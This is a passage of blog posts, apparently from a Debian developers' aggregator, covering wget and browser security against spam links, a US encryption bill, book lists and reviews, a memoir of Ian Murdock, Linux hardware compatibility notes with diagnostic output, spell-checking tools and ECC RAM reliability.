I was asked whether it would be safe to open a link in a spam message with wget. So here are some thoughts about wget security and web browser security in general. Wget Overview Some spam messages are designed to attack the recipient's computer. They can exploit bugs in the MUA, applications that may be launched to process attachments (EG MS Office), or a web browser. Wget is a very simple command-line program to download web pages; it doesn't attempt to interpret or display them. As with any network facing software there is a possibility of exploitable bugs in wget. It is theoretically possible for an attacker to have a web server that detects the client and has attacks for multiple HTTP clients including wget. In practice wget is a very simple program and simplicity makes security easier. A large portion of security flaws in web browsers are related to plugins such as Flash, rendering the page for display on a GUI system, and javascript features that wget lacks. The Profit Motive An attacker that aims to compromise online banking accounts probably isn't going to bother developing or buying an exploit against wget. The number of potential victims is extremely low and the potential revenue benefit from improving attacks against other web browsers is going to be a lot larger than developing an attack on the small number of people who use wget. In fact the potential revenue increase of targeting the most common Linux web browsers (Iceweasel and Chromium) might still be lower than that of targeting Mac users. However if the attacker doesn't have a profit motive then this may not apply. There are people and organisations who have deliberately attacked sysadmins to gain access to servers (here is an article by Bruce Schneier about the attack on Hacking Team [1]). It is plausible that someone who is targeting a sysadmin could discover that they use wget and then launch a targeted attack against them. But such an attack won't look like regular spam. For more information about targeted attacks Brian Krebs' article about CEO scams is worth reading [2]. Privilege Separation If you run wget in a regular Xterm in the same session you use for reading email etc., then an exploitable bug in wget can be used to access all of your secret data. But it is very easy to run wget from another account. You can run ssh otheraccount@localhost and then run the wget command so that it can't attack you. Don't run su otheraccount as it is possible for a compromised program to escape from that. I think that most Linux distributions have supported a switch user functionality in the X login system for a number of years. So you should be able to lock your session and then change to a session for another user to run potentially dangerous programs. It is also possible to use a separate PC for online banking and other high value operations. A 10yo PC is more than adequate for such tasks so you could just use an old PC that has been replaced for regular use for online banking etc. You could boot it from a CD or DVD if you are particularly paranoid about attack. Browser Features Google Chrome has a feature to not run plugins unless specifically permitted. This requires a couple of extra mouse actions when watching a TV program on the Internet but prevents random web sites from using Flash and Java which are two of the most common vectors of attack. Chrome also has a feature to check a web site against a Google black list before connecting.
When I was running a medium size mail server I often had to determine whether URLs being sent out by customers were legitimate or spam; if a user sent out a URL that's on Google's blacklist I would lock their account without doing any further checks. Conclusion I think that even among Linux users (who tend to be more careful about security than users of other OSs) using a separate PC and booting from a CD/DVD will generally be regarded as too much effort. Running a full featured web browser like Google Chrome and updating it whenever a new version is released will avoid most problems. Using wget when you have reason to be concerned is a possibility, but not only is it slightly inconvenient but it also often won't download the content that you want (EG in the case of HTML frames).
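To make the privilege-separation suggestion above concrete, here is a minimal sketch; the "sandbox" account name and the URL are placeholders, and it assumes you can SSH into that account on the local machine:
# create a throwaway local account once
sudo adduser sandbox
# fetch the suspicious link as that user, so a wget exploit cannot reach your own files
ssh sandbox@localhost 'wget --output-document=page.html "http://example.com/suspicious-link"'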

16 April 2016

Scott Kitterman: Future of secure systems in the US

As a rule, I avoid writing publicly on political topics, but I'm making an exception. In case you haven't been following it, the senior Republican and the senior Democrat on the Senate Intelligence Committee recently announced a legislative proposal misleadingly called the Compliance with Court Orders Act of 2016. The full text of the draft can be found here. It would effectively ban devices and software in the United States that the manufacturer cannot retrieve data from. Here is a good analysis of the breadth of the proposal and a good analysis of the bill itself. While complying with court orders might sound great in theory, in practice this means these devices and software will be insecure by design. While that's probably reasonably obvious to most normal readers here, don't just take my word for it, take Bruce Schneier's. In my opinion, policy makers (and it's not just in the United States) are suffering from a perception gap about security and how technically hard it is to get right. It seems to me that they are convinced that technologists could just do security right while still allowing some level of extraordinary access for law enforcement if they only wanted to. We've tried this before and the story never seems to end well. This isn't a complaint from wide-eyed radicals that such extraordinary access is morally wrong or inappropriate. It's hard-core technologists saying it can't be done. I don't know how to get the message across. Here's President Obama, in my opinion, completely missing the point when he equates a desire for security with fetishizing our phones above every other value. Here are some very smart people trying very hard to be reasonable about some mythical middle ground. As Riana Pfefferkorn's analysis that I linked in the first paragraph discusses, this middle ground doesn't exist and all the arm waving in the world by policy makers won't create it. Coincidentally, this same week, the White House announced a new Commission on Enhancing National Cybersecurity. Cybersecurity is certainly something we could use more of; unfortunately, Congress seems to be heading off in the opposite direction and no one from the executive branch has spoken out against it. Security and privacy are important to many people. Given the personal and financial importance of data stored in computers (traditional or mobile), users don't want criminals to get a hold of it. Companies know this, which is why both Apple iOS and Google Android encrypt their local file systems by default now. If a bill anything like what's been proposed becomes law, users that care about security are going to go elsewhere. That may end up being non-US companies' products, or US companies may shift operations to localities more friendly to secure design. Either way, the US tech sector loses. A more accurate title would have been the Technology Jobs Off-Shoring Act of 2016. EDIT: Fixed a typo.

10 April 2016

Russ Allbery: Largish haul

Let's see if I can scrounge through all of my now-organized directories of ebooks and figure out what I haven't recorded here yet. At least the paper books make that relatively easy, since I don't shelve them until I post them. (Yeah, yeah, I should actually make a database.) Hugh Aldersey-Williams - Periodic Tales (nonfiction)
Sandra Ulbrich Almazan - SF Women A-Z (nonfiction)
Radley Balko - Rise of the Warrior Cop (nonfiction)
Peter V. Brett - The Warded Man (sff)
Lois McMaster Bujold - Gentleman Jole and the Red Queen (sff)
Fred Clark - The Anti-Christ Handbook Vol. 2 (nonfiction)
Dave Duncan - West of January (sff)
Karl Fogel - Producing Open Source Software (nonfiction)
Philip Gourevitch - We Wish to Inform You That Tomorrow We Will Be Killed With Our Families (nonfiction)
Andrew Groen - Empires of EVE (nonfiction)
John Harris - @ Play (nonfiction)
David Hellman & Tevis Thompson - Second Quest (graphic novel)
M.C.A. Hogarth - Earthrise (sff)
S.L. Huang - An Examination of Collegial Dynamics... (sff)
S.L. Huang & Kurt Hunt - Up and Coming (sff anthology)
Kameron Hurley - Infidel (sff)
Kevin Jackson-Mead & J. Robinson Wheeler - IF Theory Reader (nonfiction)
Rosemary Kirstein - The Lost Steersman (sff)
Rosemary Kirstein - The Language of Power (sff)
Merritt Kopas - Videogames for Humans (nonfiction)
Alisa Krasnostein & Alexandra Pierce (ed.) - Letters to Tiptree (nonfiction)
Mathew Kumar - Exp. Negatives (nonfiction)
Ken Liu - The Grace of Kings (sff)
Susan MacGregor - The Tattooed Witch (sff)
Helen Marshall - Gifts for the One Who Comes After (sff collection)
Jack McDevitt - Coming Home (sff)
Seanan McGuire - A Red-Rose Chain (sff)
Seanan McGuire - Velveteen vs. The Multiverse (sff)
Seanan McGuire - The Winter Long (sff)
Marc Miller - Agent of the Imperium (sff)
Randall Munroe - Thing Explainer (graphic nonfiction)
Marguerite Reed - Archangel (sff)
J.K. Rowling - Harry Potter: The Complete Collection (sff)
K.J. Russell - Tides of Possibility (sff anthology)
Robert J. Sawyer - Starplex (sff)
Bruce Schneier - Secrets & Lies (nonfiction)
Mike Selinker (ed.) - The Kobold Guide to Board Game Design (nonfiction)
Douglas Smith - Chimerascope (sff collection)
Jonathan Strahan - Fearsome Journeys (sff anthology)
Nick Suttner - Shadow of the Colossus (nonfiction)
Aaron Swartz - The Boy Who Could Change the World (essays)
Caitlin Sweet - The Pattern Scars (sff)
John Szczepaniak - The Untold History of Japanese Game Developers I (nonfiction)
John Szczepaniak - The Untold History of Japanese Game Developers II (nonfiction)
Jeffrey Toobin - The Run of His Life (nonfiction)
Hayden Trenholm - Blood and Water (sff anthology)
Coen Teulings & Richard Baldwin (ed.) - Secular Stagnation (nonfiction)
Ursula Vernon - Book of the Wombat 2015 (graphic nonfiction)
Ursula Vernon - Digger (graphic novel) Phew, that was a ton of stuff. A bunch of these were from two large StoryBundle bundles, which is a great source of cheap DRM-free ebooks, although still rather hit and miss. There's a lot of just fairly random stuff that's been accumulating for a while, even though I've not had a chance to read very much. Vacation upcoming, which will be a nice time to catch up on reading.

4 January 2016

John Goerzen: Hiking a mountain with Ian Murdock

"Would you like to hike a mountain?" That question caught me by surprise. It was early in 2000, and I had flown to Tucson for a job interview. Ian Murdock was starting a new company, Progeny, and I was being interviewed for their first hire. Well, I thought, hiking will be fun. So we rode a bus or something to the top of the mountain and then hiked down. Our hike was full of, well, everything. Ian talked about Tucson and the mountains, about his time as the Debian project leader, about his college days. I asked about the plants and such we were walking past. We talked about the plans for Progeny, my background, how I might fit in. It was part interview, part hike, part two geeks chatting. Ian had no HR telling him "you can't go hiking down a mountain with a job candidate", as I'm sure HR would have. And I am glad of it, because even 16 years later, that is still by far the best time I ever had at a job interview, despite the fact that it ruined the only pair of shoes I had brought along; I had foolishly brought dress shoes for a, well, job interview. I guess it worked, too, because I was hired. Ian wanted to start up the company in Indianapolis, so over the next little while there was the busy work of moving myself and setting up an office. I remember those early days: Ian and I went computer shopping at a local shop more than once to get the first workstations and servers for the company. Somehow he had found a deal on some office space in a high-rent office building. I still remember the puzzlement on the faces of accountants and lawyers dressed up in suits riding in the elevators with us in our shorts and sandals, or tie-dye, next to them. Progeny's story was to be a complicated one. We set out to rock the world. We didn't. We didn't set out to make lasting friendships, but we often did. We set out to accomplish great things, and we did some of that, too. We experienced a full range of emotions there: elation when we got hardware auto-detection working well or when our downloads looked very popular, despair when our funding didn't come through as we had hoped, being lost when our strategy had to change multiple times. And, as is the case everywhere, none of us were perfect. I still remember the excitement after we published our first release on the Internet. Our little server that could got pegged at 100Mb of outbound bandwidth (that was something for a small company in those days). The moment must have meant something, because I still have the mrtg chart from that day on my computer, 15 years later. Progeny's Bandwidth Chart We made a good Linux distribution, an excellent Debian derivative, but commercial success did not flow from it. In the succeeding months, Ian and the company tried hard to find a strategy that would stick and make our big break. But that never happened. We had several rounds of layoffs when hoped-for funding never materialized. Ian eventually lost control of the company, and despite a few years of Itanium contract work after I left, it closed for good. Looking back, Progeny was life compressed. During the good times, we had joy, a sense of accomplishment, a sense of purpose at doing something well that was worth doing. I had what was my dream job back then: working on Debian as I loved to do, making the world a better place through Free Software, and getting paid to do it. And during the bad times, different people at Progeny experienced anger, cynicism, apathy, sorrow for the loss of our friends or plans, or simply a feeling to soldier on.
All of the emotions, good or bad, were warranted in their own way. Bruce Byfield, one of my co-workers at Progeny, recently wrote a wonderful memoriam of Ian. He wrote: "More than anything, he wanted to repeat his accomplishment with Debian, and, naturally he wondered if he could live up to his own expectations of himself. That, I think, was Ian's personal tragedy: that he had succeeded early in life, and nothing else he did with his life could quite measure up to his expectations and memories." Ian was not the only one to have some guilt over Progeny. I, for years, wondered if I should have done more for the company, could have saved things by doing something more, or different. But I always came back to the conclusion I had at the time: that there was nothing I could do, a terribly sad realization. In the years since, I watched Ubuntu take the mantle of easy-to-install Debian derivative. I saw them reprise some of the ideas we had, and even some of our mistakes. But by that time, Progeny was so thoroughly forgotten that I doubt they even realized they were doing it. I had long looked at our work at Progeny as a failure. Our main goal was never accomplished, our big product never sold many copies, our company eventually shuttered, our rock-the-world plan crumpled and forgotten. And by those traditional measurements, you could say it was a failure. But I have come to learn in the years since that success is a lot more than those things. Success is also about finding meaning and purpose through our work. As a programmer, success is nailing that algorithm that lets the application scale 10x more than before, or solving that difficult problem. As a manager, success is helping team members thrive, watching pieces come together on projects that no one person could ever do themselves. And as a person, success comes from learning from our experiences, and especially our mistakes. As J. Michael Straczynski wrote in a Babylon 5 episode, loosely paraphrased: "Maybe this experience will be a good lesson. Too bad it was so painful, but there ain't no other kind." The thing about Progeny is this: Ian built a group of people that wanted to change the world for the better. We gave it our all. And there's nothing wrong with that. Progeny did change the world. As we Progeny alumni have scattered around the country, we benefit from the lessons we learned there. And many of us were "different", sort of out of place before Progeny, and there we found others that loved C compilers, bootloaders, and GPL licenses just as much as we did. We belonged, not just online but in life, and we went on to pull confidence and skill out of our experience at Progeny and use them in all sorts of ways over the years. And so did Ian. Who could have imagined the founder of Debian and Progeny would one day lead the cause of an old-guard Unix turning Open Source? I run ZFS on my Debian system today, and Ian is partly responsible for that and his time at Progeny is too. So I can remember Ian, and Progeny, as a success. And I leave you with a photo of my best memento from the time there: an original unopened boxed copy of Progeny Linux.

13 December 2015

Robert Edmonds: Works with Debian: Intel SSD 750, AMD FirePro W4100, Dell P2715Q

I recently installed new hardware in my primary computer running Debian unstable. The disk used for the / and /home filesystem was replaced with an Intel SSD 750 series NVM Express card. The graphics card was replaced by an AMD FirePro W4100 card, and two Dell P2715Q monitors were installed. Intel SSD 750 series NVM Express card This is an 800 GB SSD on a PCI-Express x4 card (model number SSDPEDMW800G4X1) using the relatively new NVM Express interface, which appears as a /dev/nvme* device. The stretch alpha 4 Debian installer was able to detect and install onto this device, but grub-installer 1.127 on the installer media was unable to install the boot loader. This was due to a bug recently fixed in 1.128:
grub-installer (1.128) unstable; urgency=high
  * Fix buggy /dev/nvme matching in the case statement to determine
    disc_offered_devfs (Closes: #799119). Thanks, Mario Limonciello!
 -- Cyril Brulebois <kibi@debian.org>  Thu, 03 Dec 2015 00:26:42 +0100
I was able to download and install the updated .udeb by hand in the installer environment and complete the installation. This card was installed on a Supermicro X10SAE motherboard, and the UEFI BIOS was able to boot Debian directly from the NVMe card, although I updated to the latest available BIOS firmware prior to the installation. It appears in lspci like this:
02:00.0 Non-Volatile memory controller: Intel Corporation PCIe Data Center SSD (rev 01)
(prog-if 02 [NVM Express])
    Subsystem: Intel Corporation SSD 750 Series [Add-in Card]
    Flags: bus master, fast devsel, latency 0
    Memory at f7d10000 (64-bit, non-prefetchable) [size=16K]
    Expansion ROM at f7d00000 [disabled] [size=64K]
    Capabilities: [40] Power Management version 3
    Capabilities: [50] MSI-X: Enable+ Count=32 Masked-
    Capabilities: [60] Express Endpoint, MSI 00
    Capabilities: [100] Advanced Error Reporting
    Capabilities: [150] Virtual Channel
    Capabilities: [180] Power Budgeting <?>
    Capabilities: [190] Alternative Routing-ID Interpretation (ARI)
    Capabilities: [270] Device Serial Number 55-cd-2e-41-4c-90-a8-97
    Capabilities: [2a0] #19
    Kernel driver in use: nvme
The card itself appears very large in marketing photos, but this is a visual trick: the photographs are taken with the low-profile PCI bracket installed, rather than the standard height PCI bracket which it ships installed with. smartmontools fails to read SMART data from the drive, although it is still able to retrieve basic device information, including the temperature:
root@chase 0 :~# smartctl -d scsi -a /dev/nvme0n1
smartctl 6.4 2015-06-04 r4109 [x86_64-linux-4.3.0-trunk-amd64] (local build)
Copyright (C) 2002-15, Bruce Allen, Christian Franke, www.smartmontools.org
=== START OF INFORMATION SECTION ===
Vendor:               NVMe
Product:              INTEL SSDPEDMW80
Revision:             0135
Compliance:           SPC-4
User Capacity:        800,166,076,416 bytes [800 GB]
Logical block size:   512 bytes
Rotation Rate:        Solid State Device
Logical Unit id:      8086INTEL SSDPEDMW800G4                     1000CVCQ531500K2800EGN  
Serial number:        CVCQ531500K2800EGN
Device type:          disk
Local Time is:        Sun Dec 13 01:48:37 2015 EST
SMART support is:     Unavailable - device lacks SMART capability.
=== START OF READ SMART DATA SECTION ===
Current Drive Temperature:     31 C
Drive Trip Temperature:        85 C
Error Counter logging not supported
[GLTSD (Global Logging Target Save Disable) set. Enable Save with '-S on']
Device does not support Self Test logging
root@chase 4 :~# 
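As an aside, the NVMe-native health log can also be read directly with the nvme-cli userspace tool; this is a minimal sketch of an alternative I did not use above, and it assumes the nvme-cli package is installed:
# Query the controller's own health log (temperature, media errors, spare
# capacity, power-on hours) without going through smartctl's SCSI translation
nvme smart-log /dev/nvme0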
Simple tests with cat /dev/nvme0n1 >/dev/null and iotop show that the card can read data at about 1 GB/sec, about twice as fast as the SATA-based SSD that it replaced. apt/dpkg now run about as fast on the NVMe SSD as they do on a tmpfs. Hopefully this device doesn't at some point require updated firmware, like some infamous SSDs have. AMD FirePro W4100 graphics card This is a graphics card capable of driving multiple DisplayPort displays at "4K" resolution and at a 60 Hz refresh rate. It has four Mini DisplayPort connectors, although I only use two of them. It was difficult to find a sensible graphics card. Most discrete graphics cards appear to be marketed towards video gamers who apparently must seek out bulky cards that occupy multiple PCI slots and have excessive cooling devices. (To take a random example, the ASUS STRIX R9 390X has three fans and brags about its "Mega Heatpipes".) AMD markets a separate line of "FirePro" graphics cards intended for professionals rather than gamers, although they appear to be based on the same GPUs as their "Radeon" video cards. The AMD FirePro W4100 is a normal half-height PCI-E card that fits into a single PCI slot and has a relatively small cooler with a single fan. It doesn't even require an auxiliary power connection and is about the same dimensions as older video cards that I've successfully used with Debian. It was difficult to determine whether the W4100 card was actually supported by an open source driver before buying it. The word "FirePro" appears nowhere on the webpage for the X.org Radeon driver, but I was able to find "CAPE VERDE" listed as an engineering name, which appears to match the "Cape Verde" code name for the FirePro W4100 given on Wikipedia's List of AMD graphics processing units. This explains the "verde" string that appears in the firmware filenames requested by the kernel (available only in the non-free/firmware-amd-graphics package):
[drm] initializing kernel modesetting (VERDE 0x1002:0x682C 0x1002:0x2B1E).
[drm] Loading verde Microcode
radeon 0000:01:00.0: firmware: direct-loading firmware radeon/verde_pfp.bin
radeon 0000:01:00.0: firmware: direct-loading firmware radeon/verde_me.bin
radeon 0000:01:00.0: firmware: direct-loading firmware radeon/verde_ce.bin
radeon 0000:01:00.0: firmware: direct-loading firmware radeon/verde_rlc.bin
radeon 0000:01:00.0: firmware: direct-loading firmware radeon/verde_mc.bin
radeon 0000:01:00.0: firmware: direct-loading firmware radeon/verde_smc.bin
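The firmware files requested above can be confirmed to come from that package; a quick check (hypothetical commands, not part of the original installation notes):
dpkg -L firmware-amd-graphics | grep verde
# or, before installing the package, search the archive contents:
apt-file search radeon/verde_pfp.bin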
The card appears in lspci like this:
01:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] Cape Verde GL [FirePro W4100]
(prog-if 00 [VGA controller])
    Subsystem: Advanced Micro Devices, Inc. [AMD/ATI] Device 2b1e
    Flags: bus master, fast devsel, latency 0, IRQ 55
    Memory at e0000000 (64-bit, prefetchable) [size=256M]
    Memory at f7e00000 (64-bit, non-prefetchable) [size=256K]
    I/O ports at e000 [size=256]
    Expansion ROM at f7e40000 [disabled] [size=128K]
    Capabilities: [48] Vendor Specific Information: Len=08 <?>
    Capabilities: [50] Power Management version 3
    Capabilities: [58] Express Legacy Endpoint, MSI 00
    Capabilities: [a0] MSI: Enable+ Count=1/1 Maskable- 64bit+
    Capabilities: [100] Vendor Specific Information: ID=0001 Rev=1 Len=010 <?>
    Capabilities: [150] Advanced Error Reporting
    Capabilities: [200] #15
    Capabilities: [270] #19
    Kernel driver in use: radeon
The W4100 appears to work just fine, except for a few bizarre error messages that are printed to the kernel log when the displays are woken from power saving mode:
[Sun Dec 13 00:24:41 2015] [drm:si_dpm_set_power_state [radeon]] *ERROR* si_enable_smc_cac failed
[Sun Dec 13 00:24:41 2015] [drm:si_dpm_set_power_state [radeon]] *ERROR* si_enable_smc_cac failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* displayport link status failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* clock recovery failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* displayport link status failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* clock recovery failed
[Sun Dec 13 00:24:41 2015] [drm:si_dpm_set_power_state [radeon]] *ERROR* si_enable_smc_cac failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* displayport link status failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* clock recovery failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* displayport link status failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* clock recovery failed
There don't appear to be any ill effects from these error messages, though. I have the following package versions installed:
 / Name                          Version             Description
+++-=============================-===================-================================================
ii  firmware-amd-graphics         20151207-1          Binary firmware for AMD/ATI graphics chips
ii  linux-image-4.3.0-trunk-amd64 4.3-1~exp2          Linux 4.3 for 64-bit PCs
ii  xserver-xorg-video-radeon     1:7.6.1-1           X.Org X server -- AMD/ATI Radeon display driver
The Supermicro X10SAE motherboard has two PCI-E 3.0 slots, but they're listed as functioning in either "16/NA" or "8/8" mode, which apparently means that putting anything in the second slot (like the Intel 750 SSD, which uses an x4 link) causes the video card to run at a smaller x8 link width. This can be verified by looking at the widths reported in the "LnkCap" and "LnkSta" lines in the lspci -vv output:
root@chase 0 :~# lspci -vv -s 01:00.0 | egrep '(LnkCap|LnkSta):'
        LnkCap: Port #0, Speed 8GT/s, Width x16, ASPM L0s L1, Exit Latency L0s <64ns, L1 <1us
        LnkSta: Speed 8GT/s, Width x8, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt-
root@chase 0 :~# 
I did not notice any visible artifacts or performance degradation because of the smaller link width. The sensors utility from the lm-sensors package is capable of reporting the temperature of the GPU:
root@chase 0 :~# sensors radeon-pci-0100
radeon-pci-0100
Adapter: PCI adapter
temp1:        +55.0 C  (crit = +120.0 C, hyst = +90.0 C)
root@chase 0 :~# 
Dell P2715Q monitors Two new 27" Dell monitors with a native resolution of 3840x2160 were attached to the new graphics card. They replaced two ten year old Dell 2001FP monitors with a native resolution of 1600x1200 that had experienced burn-in, providing 4.32 times as many pixels. (TV and monitor manufacturers now shamelessly refer to the 3840x2160 resolution as "4K" resolution even though neither dimension reaches 4000 pixels.) There was very little to setup beyond plugging the DisplayPort inputs on these monitors into the DisplayPort outputs on the graphics card. Most of the setup involved reconfiguring software to work with the very high resolution. X.org, for tl;dr CLOSED NOTABUG reasons doesn't set the DPI correctly. These monitors have ~163 DPI resolution, so I added -dpi 168 to /etc/X11/xdm/Xservers. (168 is an even 1.75x multiple of 96.) Software like Google Chrome and xfce4-terminal rendered fonts and graphical elements at the right size, but other software like notion, pidgin, and virt-manager did not fully understand the high DPI. E.g., pidgin renders fonts at the correct size, but icons are too small. The default X cursor was also too small. To fix this, I installed the dmz-cursor-theme package, ran update-alternatives --config x-cursor-theme and selected /usr/share/icons/DMZ-Black/cursor.theme as the cursor theme. Overall, these displays are much brighter and more readable than the ones they replaced.

1 January 2015

Russ Allbery: 2014 Book Reading in Review

This year, after a series of catastrophically horrible and unethical management decisions, I walked away from my job of seventeen years and found a new job. As you might expect, reading wasn't the top priority for much of the year. I'm moderately surprised that I read as much as I did. The good side is that I'm now in a much better place both professionally and personally and no longer have to put up with draining and demoralizing nonsense happening on a regular basis. The downside for my review output is that the new job is more engrossing and is, in some ways, harder work, so I expect my reading totals going forward to stabilize somewhere below where they were in the past (although it's possible that the daily commute will change that equation somewhat). As mentioned last year, I had a feeling that something like this would happen (although not that it would be anywhere near this bad), so I had no specific reading goals for the year. Next year, I'm going to see how it goes for the first few months, and might then consider setting some goals if I want to encourage myself to take more time for reading. The statistics below are confined to the books I reviewed in 2014. I read three more books that I've not yet reviewed, partly because the end of the year isn't as packed with vacation as it was at Stanford. Those will be counted in 2015. Despite the low reading totals for the year, I read two 10 out of 10 books. My favorite book of the year was Ann Leckie's Ancillary Justice, which was one of the best science fiction novels I've ever read. Highly recommended if you like the space opera genre at all. A close second was my favorite non-fiction book of the year and the other 10 out of 10: Allie Brosh's collection Hyperbole and a Half. Those of you who have read her blog already know her brilliant and insightful style of humor. Those who haven't are in for a treat. I read a lot of non-fiction this year and not as much fiction, partly for mood reasons, so I don't have honorable mentions in the fiction department. In the non-fiction department, though, there are four more books worth mentioning. Cryptography Engineering, by Niels Ferguson, Bruce Schneier, and Tadayoshi Kohno, was the best technical book that I read last year, and a must-read for anyone who works on security or crypto software. David Graeber's Debt was the best political and economic book of the year and the book from which I learned the most. It changed the way that I think about debt and loans significantly. A close second, though, was David Roodman's Due Diligence, which is a must-read for anyone who has considered investing in microfinance or is curious about the phenomenon. We need more data-driven, thoughtful, book-length analysis like this in the world. Finally, The Knowledge, by Lewis Dartnell, is an entertaining and quixotic project. The stated goal of the book is to document the information required to rebuild civilization after a catastrophe, with hopefully fewer false starts and difficult research than was required the first time. I'm dubious about its usefulness for that goal, but it's a fascinating and entertaining book in its own right, full of detail about industrial processes and the history of manufacturing and construction that are otherwise hard to come by without extensive (and boring) research. Recommended, even if you're dubious about the efficacy of the project. The full analysis includes some additional personal reading statistics, probably only of interest to me.

29 August 2014

Jakub Wilk: More spell-checking

Have you ever wanted to use Lintian's spell-checker against arbitrary files? Now you can do it with spellintian:
$ zrun spellintian --picky /usr/share/doc/RFC/best-current-practice/rfc*
/tmp/0qgJD1Xa1Y-rfc1917.txt: amoung -> among
/tmp/kvZtN435CE-rfc3155.txt: transfered -> transferred
/tmp/o093khYE09-rfc3481.txt: unecessary -> unnecessary
/tmp/4P0ux2cZWK-rfc6365.txt: charater -> character
mwic (Misspelled Words In Context) takes a different approach. It uses classic spell-checking libraries (via Enchant), but it groups misspellings and shows them in their contexts. That way you can quickly filter out false-positives, which are very common in technical texts, using visual grep:
$ zrun mwic /usr/share/doc/debian/social-contract.txt.gz
DFSG:
   an Free Software Guidelines (DFSG)
   an Free Software Guidelines (DFSG) part of the
                                ^^^^
Perens:
     Bruce Perens later removed the Debian-spe 
  by Bruce Perens, refined by the other Debian 
           ^^^^^^
Ean, Schuessler:
  community" was suggested by Ean Schuessler. This document was drafted
                              ^^^ ^^^^^^^^^^
GPL:
  The "GPL", "BSD", and "Artistic" lice 
       ^^^
contrib:
  created "contrib" and "non-free" areas in our 
           ^^^^^^^
CDs:
  their CDs. Thus, although non-free wor 
        ^^^

11 July 2014

Russell Coker: Improving Computer Reliability

In a comment on my post about Taxing Inferior Products [1], Ben pointed out that most crashes are due to software bugs. Both Ben and I work on the Debian project and have had significant experience of software causing system crashes for Debian users. But I still think that the widespread adoption of ECC RAM is a good first step towards improving the reliability of the computing infrastructure. Currently, when software developers receive bug reports they always wonder whether the bug was caused by defective hardware. So when bugs can't be reproduced (or can't be reproduced in a way that matches the bug report) they often get put in a list of random crash reports and no further attention is paid to them. When a system has ECC RAM and a filesystem that uses checksums for all data and metadata, we can have greater confidence that random bugs aren't due to hardware problems. For example, if a user reports a file corruption bug they can't repeat, which occurred when using the Ext3 filesystem on a typical desktop PC, I'll wonder about the reliability of storage and RAM in their system. If, however, the same bug report came from someone who had ECC RAM and used the ZFS filesystem, then I would be more likely to consider it a software bug. The current situation is that every part of a typical PC is unreliable. When a bug can be attributed to one of several pieces of hardware, the OS kernel, or even malware (in the case of MS Windows), it's hard to know where to start in tracking down a bug. Most users have given up and accepted that crashing periodically is just what computers do. Even experienced Linux users sometimes give up on trying to track down bugs properly, because it's sometimes very difficult to file a good bug report. For the typical computer user (who doesn't have the power that a skilled Linux user has) it's much worse; filing a bug report seems about as useful as praying. One of the features of ECC RAM is that the motherboard can inform the user (either at boot time, after an NMI reboot, or through system diagnostics) of the problem so it can be fixed. A feature of filesystems such as ZFS and BTRFS is that they can inform the user of drive corruption problems, sometimes before any data is lost. My recommendation of BTRFS in regard to system integrity does have a significant caveat: currently the decrease in system reliability due to crashes outweighs the increase due to checksums. This isn't all bad, because at least when BTRFS crashes you know what the problem is, and BTRFS is rapidly improving in this regard. When I discuss BTRFS in posts like this one I'm considering the theoretical issues related to the design, not the practical issues of software bugs. That said, I've twice had a BTRFS filesystem seriously corrupted by a faulty DIMM on a system without ECC RAM.
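As a rough illustration of the corruption reporting mentioned above (a minimal sketch only; the pool name and mount point are placeholders):
# ZFS: scrub the pool and inspect per-device checksum error counters
zpool scrub tank
zpool status -v tank
# BTRFS: scrub the filesystem mounted at / and show its error counters
btrfs scrub start /
btrfs scrub status /
btrfs device stats /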

7 June 2014

Tim Retout: Day of Action

Today I attended the Don't Spy On Us campaign's Day Of Action at Shoreditch Town Hall in London. I'm not sure how much actual action there was, but the talking was interesting. Retrospective Day of Action drinking game: drink every time you hear the phrase "If you have nothing to hide, you have nothing to fear." The spooks have a really good marketing department. I don't write a lot on the internet any more - something I regret, actually. It can't even be because there are alternative places I am writing, because over the last couple of years I have been closing most of my social media accounts. I just share much less of myself online. On the internet, nothing is ephemeral. Bruce Schneier says so. Choose your words carefully. The thing about blogging is that it's so public. It's often tied to the writer's real-life identity. One of the valuable things about social media services is that they supposedly let you restrict who can read your words - the trade-off being that you must also grant access to advertisers, spies, cybercriminals... Most memorable moments of the day: In general, there were lots of famous people walking around as if they were normal. I was in the same room as Cory Doctorow, Jimmy Wales and Bruce Schneier at the same time. Ahem, action (mostly for UK citizens):

12 April 2014

Russ Allbery: Review: Cryptography Engineering

Review: Cryptography Engineering, by Niels Ferguson, et al.
Publisher: Wiley
Copyright: 2010
ISBN: 0-470-47424-6
Format: Kindle
Pages: 384
Subtitled Design Principles and Practical Applications, Cryptography Engineering is intended as an overview and introduction to cryptography for the non-expert. It doesn't dive deeply into the math, although there is still a fairly thorough mathematical introduction to public-key cryptography. Instead, it focuses on the principles, tools, and algorithms that are the most concretely useful to a practitioner who is trying to design secure systems rather than doing theoretical cryptography. The "et al." in the author summary hides Bruce Schneier and Tadayoshi Kohno, and this book is officially the second edition of Practical Cryptography by Ferguson and Schneier. Schneier's name will be familiar from, among other things, Applied Cryptography, and I'll have more to say later about which of the two books one should read (and the merits of reading both). But one of the immediately-apparent advantages of Cryptography Engineering is that it's recent. Its 2010 publication date means that it recommends AES as a block cipher, discusses MD5 weaknesses, and can discuss and recommend SHA-2. For the reader whose concern with cryptography is primarily "what should I use now for new work," this has huge benefit. "What should I use for new work" is the primary focus of this book. There is some survey of the field, but that survey is very limited compared to Applied Cryptography and is tightly focused on the algorithms and approaches that one might reasonably propose today. Cryptography Engineering also attempts to provide general principles and simplifying assumptions to steer readers away from trouble. One example, and the guiding principle for much of the book, is that any new system needs at least a 128-bit security level, meaning that any attack will require 2^128 steps (a back-of-envelope illustration appears at the end of this review). This requirement may be overkill in some edge cases, as the authors point out, but when one is not a cryptography expert, accepting lower security by arguments that sound plausible but may not be sound is very risky. Cryptography Engineering starts with an overview of cryptography, the basic tools of cryptographic analysis, and the issues around designing secure systems and protocols. I like that the authors not only make it clear that security programming is hard but provide a wealth of practical examples of different attack methods and 